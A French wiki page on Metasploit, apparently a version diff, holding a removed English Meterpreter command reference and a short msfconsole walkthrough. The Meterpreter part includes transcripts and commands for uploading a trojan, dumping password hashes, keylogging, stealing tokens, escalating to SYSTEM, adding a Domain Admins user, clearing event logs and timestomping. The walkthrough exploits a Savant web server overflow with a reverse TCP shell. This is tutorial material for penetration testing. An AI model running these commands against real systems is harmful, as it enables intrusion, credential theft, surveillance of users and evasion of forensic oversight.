Metasploit

De Linuxmemo.

(Différences entre les versions)
Ligne 38 : Ligne 38 :
'''Payload''' Les charges utilies (Payload en anglais) sont des portions de code (shellcode) exécutées lorsque l'exploit réussi. Les charges utiles permettent d'assurrer la communication entre Metasploit et la victime.
'''Payload''' Les charges utilies (Payload en anglais) sont des portions de code (shellcode) exécutées lorsque l'exploit réussi. Les charges utiles permettent d'assurrer la communication entre Metasploit et la victime.
-
==meterpreter==
+
* (voir [[meterpreter]])
-
 
+
-
*help
+
-
 
+
-
The 'help' command, as may be expected, displays the Meterpreter help menu.
+
-
meterpreter > help
+
-
Core Commands
+
-
=============
+
-
 
+
-
    Command      Description
+
-
    -------      -----------
+
-
    ?            Help menu
+
-
    background    Backgrounds the current session
+
-
    channel      Displays information about active channels
+
-
...snip...
+
-
 
+
-
 
+
-
*background
+
-
 
+
-
The 'background' command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again.
+
-
meterpreter > background
+
-
msf exploit(ms08_067_netapi) > sessions -i 1
+
-
[*] Starting interaction with 1...
+
-
meterpreter >
+
-
 
+
-
*ps
+
-
 
+
-
The 'ps' command displays a list of running processes on the target.
+
-
meterpreter > ps
+
-
Process list
+
-
============
+
-
 
+
-
    PID  Name                  Path
+
-
    ---  ----                  ----
+
-
    132  VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
+
-
    152  VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
+
-
    288  snmp.exe              C:\WINDOWS\System32\snmp.exe
+
-
...snip...
+
-
 
+
-
 
+
-
*migrate
+
-
 
+
-
Using the 'migrate' post module, you can migrate to another process on the victim.
+
-
meterpreter > run post/windows/manage/migrate
+
-
[*] Running module against V-MAC-XP
+
-
[*] Current server process: svchost.exe (1076)
+
-
[*] Migrating to explorer.exe...
+
-
[*] Migrating into process ID 816
+
-
[*] New server process: Explorer.EXE (816)
+
-
meterpreter >
+
-
 
+
-
*ls
+
-
 
+
-
As in Linux, the 'ls' command will list the files in the current remote directory.
+
-
meterpreter > ls
+
-
Listing: C:\Documents and Settings\victim
+
-
=========================================
+
-
Mode              Size    Type  Last modified                  Name
+
-
----              ----    ----  -------------                  ----
+
-
40777/rwxrwxrwx  0        dir  Sat Oct 17 07:40:45 -0600 2009  .
+
-
40777/rwxrwxrwx  0        dir  Fri Jun 19 13:30:00 -0600 2009  ..
+
-
100666/rw-rw-rw-  218      fil  Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
+
-
40555/r-xr-xr-x  0        dir  Wed Nov 04 19:44:05 -0700 2009  Application Data
+
-
...snip...
+
-
 
+
-
 
+
-
*download
+
-
 
+
-
The 'download' command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.
+
-
meterpreter > download c:\\boot.ini
+
-
[*] downloading: c:\boot.ini -> c:\boot.ini
+
-
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
+
-
meterpreter >
+
-
 
+
-
 
+
-
*upload
+
-
 
+
-
As with the 'download' command, you need to use double-slashes with the 'upload' command.
+
-
meterpreter > upload evil_trojan.exe c:\\windows\\system32
+
-
[*] uploading  : evil_trojan.exe -> c:\windows\system32
+
-
[*] uploaded  : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
+
-
meterpreter >
+
-
 
+
-
 
+
-
*ipconfig
+
-
 
+
-
The 'ipconfig' command displays the network interfaces and addresses on the remote machine.
+
-
meterpreter > ipconfig
+
-
MS TCP Loopback interface
+
-
Hardware MAC: 00:00:00:00:00:00
+
-
IP Address  : 127.0.0.1
+
-
Netmask    : 255.0.0.0
+
-
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
+
-
Hardware MAC: 00:0c:29:10:f5:15
+
-
IP Address  : 192.168.1.104
+
-
Netmask    : 255.255.0.0
+
-
meterpreter >
+
-
 
+
-
 
+
-
*getuid
+
-
 
+
-
Running 'getuid' will display the user that the Meterpreter server is running as on the host.
+
-
meterpreter > getuid
+
-
Server username: NT AUTHORITY\SYSTEM
+
-
meterpreter >
+
-
 
+
-
 
+
-
*execute
+
-
 
+
-
The 'execute' command runs a command on the target.
+
-
meterpreter > execute -f cmd.exe -i -H
+
-
Process 38320 created.
+
-
Channel 1 created.
+
-
Microsoft Windows XP [Version 5.1.2600]
+
-
(C) Copyright 1985-2001 Microsoft Corp.
+
-
C:\WINDOWS\system32>
+
-
 
+
-
 
+
-
*shell
+
-
 
+
-
The 'shell' command will present you with a standard shell on the target system.
+
-
meterpreter > shell
+
-
Process 39640 created.
+
-
Channel 2 created.
+
-
Microsoft Windows XP [Version 5.1.2600]
+
-
(C) Copyright 1985-2001 Microsoft Corp.
+
-
C:\WINDOWS\system32>
+
-
 
+
-
 
+
-
*idletime
+
-
 
+
-
Running 'idletime' will display the number of seconds that the user at the remote machine has been idle.
+
-
meterpreter > idletime
+
-
User has been idle for: 5 hours 26 mins 35 secs
+
-
meterpreter >
+
-
 
+
-
 
+
-
*hashdump
+
-
 
+
-
The 'hashdump' post module will dump the contents of the SAM database.
+
-
 
+
-
help
+
-
 
+
-
Open Meterpreter usage help
+
-
 
+
-
run scriptname
+
-
 
+
-
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter
+
-
directory
+
-
 
+
-
sysinfo
+
-
 
+
-
Show the system information on the remote target
+
-
 
+
-
ls
+
-
 
+
-
List the files and folders on the target
+
-
 
+
-
use priv
+
-
 
+
-
Load the privilege extension for extended Meterpreter libraries
+
-
 
+
-
ps
+
-
 
+
-
Show all running processes and which accounts are associated with each process
+
-
 
+
-
migrate PID
+
-
 
+
-
Migrate to the specific process ID (PID is the target process ID gained
+
-
from the ps command)
+
-
 
+
-
use incognito
+
-
 
+
-
Load incognito functions. (Used for token stealing and impersonation on
+
-
a target machine)
+
-
 
+
-
list_tokens -u
+
-
 
+
-
List available tokens on the target by user
+
-
 
+
-
list_tokens -g
+
-
 
+
-
List available tokens on the target by group
+
-
 
+
-
impersonate_token DOMAIN_NAME\\USERNAME
+
-
 
+
-
Impersonate a token available on the target
+
-
 
+
-
steal_token PID
+
-
 
+
-
Steal the tokens available for a given process and impersonate that token
+
-
 
+
-
drop_token
+
-
 
+
-
Stop impersonating the current token
+
-
 
+
-
getsystem
+
-
 
+
-
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors
+
-
 
+
-
shell
+
-
 
+
-
Drop into an interactive shell with all available tokens
+
-
 
+
-
execute -f cmd.exe -i
+
-
 
+
-
Execute cmd.exe and interact with it
+
-
 
+
-
execute -f cmd.exe -i -t
+
-
 
+
-
Execute cmd.exe with all available tokens
+
-
 
+
-
execute -f cmd.exe -i -H -t
+
-
 
+
-
Execute cmd.exe with all available tokens and make it a hidden process
+
-
 
+
-
rev2self
+
-
 
+
-
Revert back to the original user you used to compromise the target
+
-
 
+
-
reg command
+
-
 
+
-
Interact, create, delete, query, set, and much more in the target’s registry
+
-
 
+
-
setdesktop number
+
-
 
+
-
Switch to a different screen based on who is logged in
+
-
 
+
-
screenshot
+
-
 
+
-
Take a screenshot of the target’s screen
+
-
 
+
-
upload file
+
-
 
+
-
Upload a file to the target
+
-
 
+
-
download file
+
-
 
+
-
Download a file from the target
+
-
 
+
-
keyscan_start
+
-
 
+
-
Start sniffing keystrokes on the remote target
+
-
 
+
-
keyscan_dump
+
-
 
+
-
Dump the remote keys captured on the target
+
-
 
+
-
keyscan_stop
+
-
 
+
-
Stop sniffing keystrokes on the remote target
+
-
 
+
-
getprivs
+
-
 
+
-
Get as many privileges as possible on the target
+
-
 
+
-
uictl enable keyboard/mouse
+
-
 
+
-
Take control of the keyboard and/or mouse
+
-
 
+
-
background
+
-
 
+
-
Run your current Meterpreter shell in the background
+
-
 
+
-
hashdump
+
-
 
+
-
Dump all hashes on the target
+
-
 
+
-
use sniffer
+
-
 
+
-
Load the sniffer module
+
-
 
+
-
sniffer_interfaces
+
-
 
+
-
List the available interfaces on the target
+
-
 
+
-
sniffer_dump interfaceID pcapname
+
-
 
+
-
Start sniffing on the remote target
+
-
 
+
-
sniffer_start interfaceID packet-buffer
+
-
 
+
-
Start sniffing with a specific range for a packet buffer
+
-
 
+
-
sniffer_stats interfaceID
+
-
 
+
-
Grab statistical information from the interface you are sniffing
+
-
 
+
-
sniffer_stop interfaceID
+
-
 
+
-
Stop the sniffer
+
-
 
+
-
add_user username password -h ip
+
-
 
+
-
Add a user on the remote target
+
-
 
+
-
add_group_user “Domain Admins” username -h ip
+
-
 
+
-
Add a username to the Domain Administrators group on the remote target
+
-
 
+
-
clearev
+
-
 
+
-
Clear the event log on the target machine
+
-
 
+
-
timestomp
+
-
 
+
-
Change file attributes, such as creation date (antiforensics measure)
+
-
 
+
-
reboot
+
-
 
+
-
Reboot the target machine
+

Version du 30 août 2012 à 08:29


shell

help, info, set, show et use. 

show exploits
search 
use windows/http/savant_31_overflow
show options
set RHOST 192.168.1.5
show targets
set TARGET 0
show payloads
set PAYLOAD windows/shell/reverse_nonx_tcp
show options
exploit

show options Affiche la liste des options et valeurs courantes (celles spécifiées avec la commande set)

show exploits Affiche la liste des exploits

show targets Affiche la liste des cibles

show payloads Affiche la liste des payloads disponibles

show advanced Affiche les options avancées

Arborescence des modules

Auxiliary La version 3.0 supporte le concept de modules auxiliaires qui peuvent être utilisés afin d'exécuter des actions arbitraires telles que le scan de ports, le déni de services entre autres.

Encoder

Exploit Les modules "Exploit" sont les modules principaux dans Metasploit.

Nop Les modules NOP sont utilisés pour les instructions de type "no-operation" pour exploiter les débordements de buffers.

Payload Les charges utilies (Payload en anglais) sont des portions de code (shellcode) exécutées lorsque l'exploit réussi. Les charges utiles permettent d'assurrer la communication entre Metasploit et la victime.

Récupérée de « http://linuxmemo.free.fr/index.php?title=Metasploit »
Outils personnels